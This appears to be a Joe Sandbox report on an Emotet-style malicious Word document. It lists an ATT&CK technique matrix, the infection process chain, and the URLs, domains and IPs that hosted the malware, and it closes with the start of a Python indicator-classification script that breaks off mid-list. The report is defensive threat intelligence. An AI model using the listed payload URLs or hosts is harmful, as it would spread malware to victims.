                      Source: Yara matchFile source: 12.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation11 | Path Interception | Process Injection111 | Disable or Modify Tools1 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scripting32 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information3 | LSASS Memory | File and Directory Discovery3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel22 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Native API1 | Logon Script (Windows) | Logon Script (Windows) | Scripting32 | Security Account Manager | System Information Discovery26 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | Exploitation for Client Execution3 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information1 | NTDS | Security Software Discovery31 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol14 | SIM Card Swap | Carrier Billing Fraud |
                      Cloud Accounts | Command and Scripting Interpreter211 | Network Logon Script | Network Logon Script | Masquerading11 | LSA Secrets | Virtualization/Sandbox Evasion2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
                      Replication Through Removable Media | PowerShell3 | Rc.common | Rc.common | Virtualization/Sandbox Evasion2 | Cached Domain Credentials | Process Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection111 | DCSync | Remote System Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll321 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |

                      Behavior Graph

                      Behavior Graph ID: 337092 | Sample: MAIL-0573188.doc | Start date: 07/01/2021 | Architecture: WINDOWS | Score: 100

                      Sample-level signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 13 other signatures

                      Process tree and network contacts recovered from the graph:
                      • WINWORD.EXE 293 27 started
                      • cmd.exe started; signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found; PowerShell case anomaly found
                        • cmd.exe started powershell.exe 12 9 and msg.exe
                        • powershell.exe contacted khanhhoahomnay.net 210.86.239.69, 49171, 80 (NETNAM-AS-APNetnamCompanyVN, Viet Nam); veterinariadrpopui.com 209.59.139.39, 49167, 80 (LIQUIDWEBUS, United States); 3 other IPs or domains
                        • powershell.exe started rundll32.exe
                          • rundll32.exe started rundll32.exe 15, which started a chain of five further rundll32.exe 5 instances, ending in rundll32.exe 13; each of the six intermediate rundll32.exe instances carries the signature "Hides that the sample has been downloaded from the Internet (zone.identifier)"
                          • the final rundll32.exe 13 contacted 5.2.136.90, 49172, 80 (RCS-RDS73-75DrStaicoviciRO, Romania); signature: System process connects to network (likely due to code injection or exploit)

                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      MAIL-0573188.doc | 67% | Virustotal |
                      MAIL-0573188.doc | 50% | Metadefender |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      7.2.rundll32.exe.210000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      13.2.rundll32.exe.1f0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      12.2.rundll32.exe.210000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      9.2.rundll32.exe.1f0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      10.2.rundll32.exe.1f0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      11.2.rundll32.exe.2e0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      8.2.rundll32.exe.320000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                      Domains

                      Source | Detection | Scanner | Label
                      veterinariadrpopui.com | 7% | Virustotal |
                      wpsapk.com | 1% | Virustotal |
                      sofsuite.com | 4% | Virustotal |
                      khanhhoahomnay.net | 6% | Virustotal |

                      URLs

                      Source | Detection | Scanner | Label
                      https://shop.elemenslide.com/wp-content/n/ | 0% | Avira URL Cloud | safe
                      http://veterinariadrpopui.com | 100% | Avira URL Cloud | malware
                      http://veterinariadrpopui.com/content/5f18Q/ | 100% | Avira URL Cloud | malware
                      http://sofsuite.com/wp-includes/2jm3nIk/ | 100% | Avira URL Cloud | phishing
                      http://khanhhoahomnay.net/wordpress/CGMC/ | 100% | Avira URL Cloud | malware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
                      http://beatlemail.net/picture.php?blogid=0 | 0% | Avira URL Cloud | safe
                      https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/ | 100% | Avira URL Cloud | malware
                      https://shop.elemenslide.com | 0% | Avira URL Cloud | safe
                      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
                      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
                      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
                      http://shop.elemenslide.com | 0% | Avira URL Cloud | safe
                      http://khanhhoahomnay.net | 0% | Avira URL Cloud | safe
                      http://shop.elemenslide.com/wp-content/n/ | 100% | Avira URL Cloud | malware
                      http://sofsuite.com | 0% | Avira URL Cloud | safe
                      http://wpsapk.com | 0% | Avira URL Cloud | safe
                      http://www.%s.comPA | 0% | URL Reputation | safe
                      http://www.%s.comPA | 0% | URL Reputation | safe
                      http://www.%s.comPA | 0% | URL Reputation | safe
                      http://wpsapk.com/wp-admin/v/ | 100% | Avira URL Cloud | malware
                      https://shop.elemenslide.comp | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      veterinariadrpopui.com | 209.59.139.39 | true | true | | unknown
                      wpsapk.com | 172.67.141.14 | true | true | | unknown
                      sofsuite.com | 172.67.158.72 | true | true | | unknown
                      khanhhoahomnay.net | 210.86.239.69 | true | true | | unknown
                      shop.elemenslide.com | 45.130.229.91 | true | true | | unknown

                        Contacted URLs

                      Name | Malicious | Antivirus Detection | Reputation
                      http://veterinariadrpopui.com/content/5f18Q/ | true | Avira URL Cloud: malware | unknown
                      http://sofsuite.com/wp-includes/2jm3nIk/ | true | Avira URL Cloud: phishing | unknown
                      http://khanhhoahomnay.net/wordpress/CGMC/ | true | Avira URL Cloud: malware | unknown
                      http://shop.elemenslide.com/wp-content/n/ | true | Avira URL Cloud: malware | unknown
                      http://wpsapk.com/wp-admin/v/ | true | Avira URL Cloud: malware | unknown

                        URLs from Memory and Binaries

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://www.windows.com/pctv. | rundll32.exe, 00000008.00000002.2103265180.0000000001FC0000.00000002.00000001.sdmp | false | | high
                      https://shop.elemenslide.com/wp-content/n/ | powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://veterinariadrpopui.com | powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
                      http://investor.msn.com | rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp | false | | high
                      http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp | false | | high
                      http://www.piriform.com/ccleaneH) | powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp | false | | high
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
                      http://www.hotmail.com/oe | rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp | false | | high
                      http://beatlemail.net/picture.php?blogid=0 | powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/ | powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
                      https://www.cloudflare.com/5xx-error-landing | powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmp | false | | high
                      https://shop.elemenslide.com | powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp | false | | high
                      http://www.icra.org/vocabulary/. | rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp | false | | high
                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp | false | | high
                      http://shop.elemenslide.com | powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
                      http://khanhhoahomnay.net | powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
                      http://investor.msn.com/ | rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp | false | | high
                      http://sofsuite.com | powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
                      https://www.cloudflare.com/5xx-error-landing/ | powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmp | false | | high
                      http://wpsapk.com | powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
                      http://www.%s.comPA | powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | low
                      https://shop.elemenslide.comp | powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                                              Contacted IPs


                                              Public

                      IP | Domain | Country | ASN | ASN Name | Malicious
                      210.86.239.69 | unknown | Viet Nam | 24173 | NETNAM-AS-APNetnamCompanyVN | true
                      209.59.139.39 | unknown | United States | 32244 | LIQUIDWEBUS | true
                      172.67.141.14 | unknown | United States | 13335 | CLOUDFLARENETUS | true
                      45.130.229.91 | unknown | Germany | 47583 | AS-HOSTINGERLT | true
                      5.2.136.90 | unknown | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | true
                      172.67.158.72 | unknown | United States | 13335 | CLOUDFLARENETUS | true

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:337092
                                              Start date:07.01.2021
                                              Start time:18:43:35
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 17s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:MAIL-0573188.doc
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of new started processes analysed:15
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • GSI enabled (VBA)
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winDOC@22/8@6/6
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 84.3% (good quality ratio 80.8%)
                                              • Quality average: 74.4%
                                              • Quality standard deviation: 25.6%
                                              HCA Information:
                                              • Successful, ratio: 91%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .doc
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Found warning dialog
                                              • Click Ok
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                              • TCP Packets have been reduced to 100
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                      Time | Type | Description
                      18:44:38 | API Interceptor | 1x Sleep call for process: msg.exe modified
                      18:44:39 | API Interceptor | 67x Sleep call for process: powershell.exe modified
                      18:44:46 | API Interceptor | 883x Sleep call for process: rundll32.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                               Match | Associated Sample Name / URL | Detection | Context
                                               210.86.239.69 | dat_513543.doc | malicious | khanhhoahomnay.net/wordpress/CGMC/
                                               210.86.239.69 | DATA-480841.doc | malicious | khanhhoahomnay.net/wordpress/CGMC/
                                               210.86.239.69 | Documenten_9274874 8574977265.doc | malicious | khanhhoahomnay.net/wordpress/CGMC/
                                               210.86.239.69 | pack-91089 416755919.doc | malicious | khanhhoahomnay.net/wordpress/CGMC/
                                               209.59.139.39 | dat_513543.doc | malicious | veterinariadrpopui.com/content/5f18Q/
                                               209.59.139.39 | DATA-480841.doc | malicious | veterinariadrpopui.com/content/5f18Q/
                                               209.59.139.39 | Documenten_9274874 8574977265.doc | malicious | veterinariadrpopui.com/content/5f18Q/
                                               209.59.139.39 | pack-91089 416755919.doc | malicious | veterinariadrpopui.com/content/5f18Q/
                                               209.59.139.39 | Adjunto.doc | malicious | veterinariadrpopui.com/content/5f18Q/
                                               209.59.139.39 | NQN0244_012021.doc | malicious | veterinariadrpopui.com/content/5f18Q/
                                               209.59.139.39 | 4560 2021 UE_9893.doc | malicious | veterinariadrpopui.com/content/5f18Q/
                                               209.59.139.39 | Scan-0767672.doc | malicious | veterinariadrpopui.com/content/5f18Q/
                                               209.59.139.39 | Documento-2021.doc | malicious | veterinariadrpopui.com/content/5f18Q/
                                               209.59.139.39 | info_39534.doc | malicious | veterinariadrpopui.com/content/5f18Q/
                                               209.59.139.39 | http://btxtfnereq4mf3x3q1eq1sdudvhhiurr.www4.me | malicious | cirugiaesteticamexico.medicainspira.com/wordpress/wp-content/upgrade/i/googlephotos/album/
                                               172.67.141.14 | Documento-2021.doc | malicious | wpsapk.com/wp-admin/v/
                                               172.67.141.14 | info_39534.doc | malicious | wpsapk.com/wp-admin/v/
                                               45.130.229.91 | Adjunto.doc | malicious | shop.elemenslide.com/wp-content/n/
                                               45.130.229.91 | NQN0244_012021.doc | malicious | shop.elemenslide.com/wp-content/n/
                                               45.130.229.91 | 4560 2021 UE_9893.doc | malicious | shop.elemenslide.com/wp-content/n/
                                               45.130.229.91 | Scan-0767672.doc | malicious | shop.elemenslide.com/wp-content/n/
                                               45.130.229.91 | Documento-2021.doc | malicious | shop.elemenslide.com/wp-content/n/

                                              Domains

                                               Match | Associated Sample Name / URL | Detection | Context
                                               wpsapk.com | dat_513543.doc | malicious | 104.18.61.59
                                               wpsapk.com | DATA-480841.doc | malicious | 104.18.61.59
                                               wpsapk.com | Documenten_9274874 8574977265.doc | malicious | 104.18.61.59
                                               wpsapk.com | pack-91089 416755919.doc | malicious | 104.18.61.59
                                               wpsapk.com | Adjunto.doc | malicious | 104.18.60.59
                                               wpsapk.com | NQN0244_012021.doc | malicious | 104.18.60.59
                                               wpsapk.com | 4560 2021 UE_9893.doc | malicious | 104.18.61.59
                                               wpsapk.com | Scan-0767672.doc | malicious | 104.18.60.59
                                               wpsapk.com | Documento-2021.doc | malicious | 172.67.141.14
                                               wpsapk.com | info_39534.doc | malicious | 172.67.141.14
                                               veterinariadrpopui.com | dat_513543.doc | malicious | 209.59.139.39
                                               veterinariadrpopui.com | DATA-480841.doc | malicious | 209.59.139.39
                                               veterinariadrpopui.com | Documenten_9274874 8574977265.doc | malicious | 209.59.139.39
                                               veterinariadrpopui.com | pack-91089 416755919.doc | malicious | 209.59.139.39
                                               veterinariadrpopui.com | Adjunto.doc | malicious | 209.59.139.39
                                               veterinariadrpopui.com | NQN0244_012021.doc | malicious | 209.59.139.39
                                               veterinariadrpopui.com | 4560 2021 UE_9893.doc | malicious | 209.59.139.39
                                               veterinariadrpopui.com | Scan-0767672.doc | malicious | 209.59.139.39
                                               veterinariadrpopui.com | Documento-2021.doc | malicious | 209.59.139.39
                                               veterinariadrpopui.com | info_39534.doc | malicious | 209.59.139.39
                                               sofsuite.com | dat_513543.doc | malicious | 104.27.144.251
                                               sofsuite.com | DATA-480841.doc | malicious | 104.27.145.251
                                               sofsuite.com | Documenten_9274874 8574977265.doc | malicious | 104.27.144.251
                                               sofsuite.com | pack-91089 416755919.doc | malicious | 104.27.145.251
                                               sofsuite.com | Adjunto.doc | malicious | 104.27.144.251
                                               sofsuite.com | NQN0244_012021.doc | malicious | 104.27.144.251
                                               sofsuite.com | 4560 2021 UE_9893.doc | malicious | 104.27.145.251
                                               sofsuite.com | Scan-0767672.doc | malicious | 104.27.144.251
                                               sofsuite.com | Documento-2021.doc | malicious | 104.27.145.251
                                               sofsuite.com | info_39534.doc | malicious | 172.67.158.72
                                               shop.elemenslide.com | Adjunto.doc | malicious | 45.130.229.91
                                               shop.elemenslide.com | NQN0244_012021.doc | malicious | 45.130.229.91
                                               shop.elemenslide.com | 4560 2021 UE_9893.doc | malicious | 45.130.229.91
                                               shop.elemenslide.com | Scan-0767672.doc | malicious | 45.130.229.91
                                               shop.elemenslide.com | Documento-2021.doc | malicious | 45.130.229.91
                                               khanhhoahomnay.net | dat_513543.doc | malicious | 210.86.239.69
                                               khanhhoahomnay.net | DATA-480841.doc | malicious | 210.86.239.69
                                               khanhhoahomnay.net | Documenten_9274874 8574977265.doc | malicious | 210.86.239.69
                                               khanhhoahomnay.net | pack-91089 416755919.doc | malicious | 210.86.239.69

                                              ASN

                                               Match | Associated Sample Name / URL | Detection | Context
                                               CLOUDFLARENET US | DSj7ak0N6I.exe | malicious | 104.28.5.151
                                               CLOUDFLARENET US | https://wqi69130.mfs.gg/099mmYl | malicious | 172.67.74.85
                                               CLOUDFLARENET US | https://lakewooderie.umcchurches.org/verify#Sugar@saccounty.net | malicious | 104.16.19.94
                                               CLOUDFLARENET US | https://web.tresorit.com/l/JG7xl#7YqXRnhV6spRT3ekJskNaw | malicious | 104.18.70.113
                                               CLOUDFLARENET US | https://zxcew43nrgjvfejcnwrtjnvfdcsxe3rfc.s3.amazonaws.com/eudjscndfjhvndcsjfergvdcsce34redc.html | malicious | 104.16.19.94
                                               CLOUDFLARENET US | https://bit.ly/2Jjog0H | malicious | 172.67.72.46
                                               CLOUDFLARENET US | Inrialpes-letter.html | malicious | 104.16.19.94
                                               CLOUDFLARENET US | https://webmail-4fd4rvt.web.app/?emailtoken=jmahler@vocera.com&domain=vocera.com | malicious | 162.159.137.81
                                               CLOUDFLARENET US | order no. 3643.exe | malicious | 23.227.38.74
                                               CLOUDFLARENET US | JI35907_2020.doc | malicious | 172.67.215.117
                                               CLOUDFLARENET US | http://46.101.152.151/?email=michael.little@austalusa.com | malicious | 104.16.19.94
                                               CLOUDFLARENET US | Order.exe | malicious | 23.227.38.74
                                               CLOUDFLARENET US | http://search.hwatchtvnow.co | malicious | 104.18.225.52
                                               CLOUDFLARENET US | info.doc | malicious | 104.27.163.61
                                               CLOUDFLARENET US | http://keb67683.mfs.gg/Ohz4uhj | malicious | 104.26.7.10
                                               CLOUDFLARENET US | LUJZShZCgN.exe | malicious | 172.67.201.126
                                               CLOUDFLARENET US | https://bit.ly/3hDDoTm | malicious | 104.16.19.94
                                               CLOUDFLARENET US | https://moorparklancssch-my.sharepoint.com/:o:/g/personal/16willcocks_pupils_moorpark_mp/EpuojDvAqLNHlYVejf5zx0kBqAdkUjR2VgNWcoUhvcauDg?e=Th0p8a | malicious | 104.18.29.243
                                               CLOUDFLARENET US | 3AD78RVleO.exe | malicious | 172.67.188.154
                                               CLOUDFLARENET US | https://bit.ly/3ba3hZS | malicious | 104.16.18.94
                                               NETNAM-AS-AP Netnam Company VN | dat_513543.doc | malicious | 210.86.239.69
                                               NETNAM-AS-AP Netnam Company VN | DATA-480841.doc | malicious | 210.86.239.69
                                               NETNAM-AS-AP Netnam Company VN | Documenten_9274874 8574977265.doc | malicious | 210.86.239.69
                                               NETNAM-AS-AP Netnam Company VN | pack-91089 416755919.doc | malicious | 210.86.239.69
                                               LIQUIDWEB US | JI35907_2020.doc | malicious | 67.225.191.31
                                               LIQUIDWEB US | dat_513543.doc | malicious | 209.59.139.39
                                               LIQUIDWEB US | https://encrypt.idnmazate.org | malicious | 67.225.177.41
                                               LIQUIDWEB US | DATA-480841.doc | malicious | 209.59.139.39
                                               LIQUIDWEB US | Documenten_9274874 8574977265.doc | malicious | 209.59.139.39
                                               LIQUIDWEB US | pack-91089 416755919.doc | malicious | 209.59.139.39
                                               LIQUIDWEB US | https://securemail.bridgepointeffect.com/ | malicious | 69.167.167.26
                                               LIQUIDWEB US | Adjunto.doc | malicious | 209.59.139.39
                                               LIQUIDWEB US | NQN0244_012021.doc | malicious | 209.59.139.39
                                               LIQUIDWEB US | 4560 2021 UE_9893.doc | malicious | 209.59.139.39
                                               LIQUIDWEB US | Scan-0767672.doc | malicious | 209.59.139.39
                                               LIQUIDWEB US | Documento-2021.doc | malicious | 209.59.139.39
                                               LIQUIDWEB US | info_39534.doc | malicious | 209.59.139.39
                                               LIQUIDWEB US | https://encrypt.idnmazate.org/ | malicious | 67.225.177.41
                                               LIQUIDWEB US | Nuevo pedido.exe | malicious | 209.188.81.142
                                               LIQUIDWEB US | https://6354mortgagestammp.com/ | malicious | 69.16.199.206
                                               LIQUIDWEB US | rib.exe | malicious | 72.52.175.20
                                               LIQUIDWEB US | https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fsecuremail.danchihosassociates.com&c=E,1,HOuENPlSucTdSUxKwjhrlo_5dPC7J6R1N-Gq03z50mu0n-SbGg9k6UcvRdnb2hWVC0JKp04hBPt2pBkJTi_IhWBa5JSs0U_QUfg3Hl_nTWTxJyTIR8N3&typo=1 | malicious | 67.225.158.30
                                               LIQUIDWEB US | messaggio 2912.doc | malicious | 67.227.152.97
                                               LIQUIDWEB US | 8415051-122020.doc | malicious | 67.227.152.97
                                               AS-HOSTINGER LT | Inrialpes-letter.html | malicious | 185.224.138.98
                                               AS-HOSTINGER LT | order no. 3643.exe | malicious | 31.170.161.33
                                               AS-HOSTINGER LT | SKM_C258201001130020005057.exe | malicious | 31.170.166.165
                                               AS-HOSTINGER LT | bing.dll | malicious | 45.84.204.148
                                               AS-HOSTINGER LT | Inquiry-RFQ93847849-pdf.exe | malicious | 193.168.194.5
                                               AS-HOSTINGER LT | invoice-ID711675345593.vbs | malicious | 141.136.39.142
                                               AS-HOSTINGER LT | Adjunto.doc | malicious | 45.130.229.91
                                               AS-HOSTINGER LT | NQN0244_012021.doc | malicious | 45.130.229.91
                                               AS-HOSTINGER LT | 4560 2021 UE_9893.doc | malicious | 45.130.229.91
                                               AS-HOSTINGER LT | Scan-0767672.doc | malicious | 45.130.229.91
                                               AS-HOSTINGER LT | Documento-2021.doc | malicious | 45.130.229.91
                                               AS-HOSTINGER LT | SecuriteInfo.com.Variant.Razy.820883.21352.exe | malicious | 193.168.194.5
                                               AS-HOSTINGER LT | Rfq 214871_TAWI Catalog.exe | malicious | 194.59.164.91
                                               AS-HOSTINGER LT | TN22020000560175.exe | malicious | 194.59.164.34
                                               AS-HOSTINGER LT | wDMBDrN663.exe | malicious | 31.220.110.116
                                               AS-HOSTINGER LT | ORDER 172IKL0153094.exe | malicious | 31.170.161.33
                                               AS-HOSTINGER LT | SecuriteInfo.com.VB.Heur.EmoDldr.32.51B75357.Gen.18944.doc | malicious | 185.224.137.23
                                               AS-HOSTINGER LT | KX Trainer V2.exe | malicious | 194.5.156.24
                                               AS-HOSTINGER LT | https://j.mp/3h2fG2Z | malicious | 156.67.222.153
                                               AS-HOSTINGER LT | JgHsz8Vvc8.exe | malicious | 213.190.6.55
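The IP, domain and ASN context tables above pivot across other Emotet maldoc submissions that share the same distribution hosts. Note that several of the resolved addresses (104.18.x.x, 104.27.x.x, 172.67.x.x, 162.159.x.x) are Cloudflare edge addresses shared by many unrelated sites, which is also why the CLOUDFLARENET row lists samples with no relation to this campaign; blocking those IPs is ineffective and causes collateral damage, whereas the directly hosted servers (209.59.139.39, 45.130.229.91, 210.86.239.69) are attributable. The script below is an added example for this page and not part of the Joe Sandbox report: it takes a handful of rows transcribed from the tables above, classifies each IP against a subset of Cloudflare's published IPv4 prefixes (an assumption; the list at cloudflare.com/ips-v4 should be refreshed before production use) and emits domain and URL indicators for CDN-fronted hosts, IP indicators only for the rest, plus a per-host count of distinct samples for campaign pivoting.

```python
"""Turn sandbox 'Context' rows into actionable indicators.

Added example for this report page, not Joe Sandbox code. Rows below are
transcribed from the IPs/Domains tables above; the CDN prefix list is a
subset of Cloudflare's published IPv4 ranges and is an assumption.
"""
import ipaddress
from collections import defaultdict

# Subset of https://www.cloudflare.com/ips-v4 covering the addresses in this
# report (assumption: these are shared CDN edges, never attributable hosts).
CDN_PREFIXES = [ipaddress.ip_network(p) for p in (
    "104.16.0.0/13", "104.24.0.0/14", "162.159.0.0/16", "172.64.0.0/13",
)]

# (domain, resolved IP, sample, URL path or None) transcribed from the tables.
CONTEXT_ROWS = [
    ("wpsapk.com", "104.18.61.59", "dat_513543.doc", None),
    ("wpsapk.com", "104.18.60.59", "Adjunto.doc", None),
    ("wpsapk.com", "172.67.141.14", "Documento-2021.doc", "/wp-admin/v/"),
    ("sofsuite.com", "104.27.144.251", "dat_513543.doc", None),
    ("veterinariadrpopui.com", "209.59.139.39", "dat_513543.doc", "/content/5f18Q/"),
    ("veterinariadrpopui.com", "209.59.139.39", "Adjunto.doc", "/content/5f18Q/"),
    ("shop.elemenslide.com", "45.130.229.91", "Adjunto.doc", "/wp-content/n/"),
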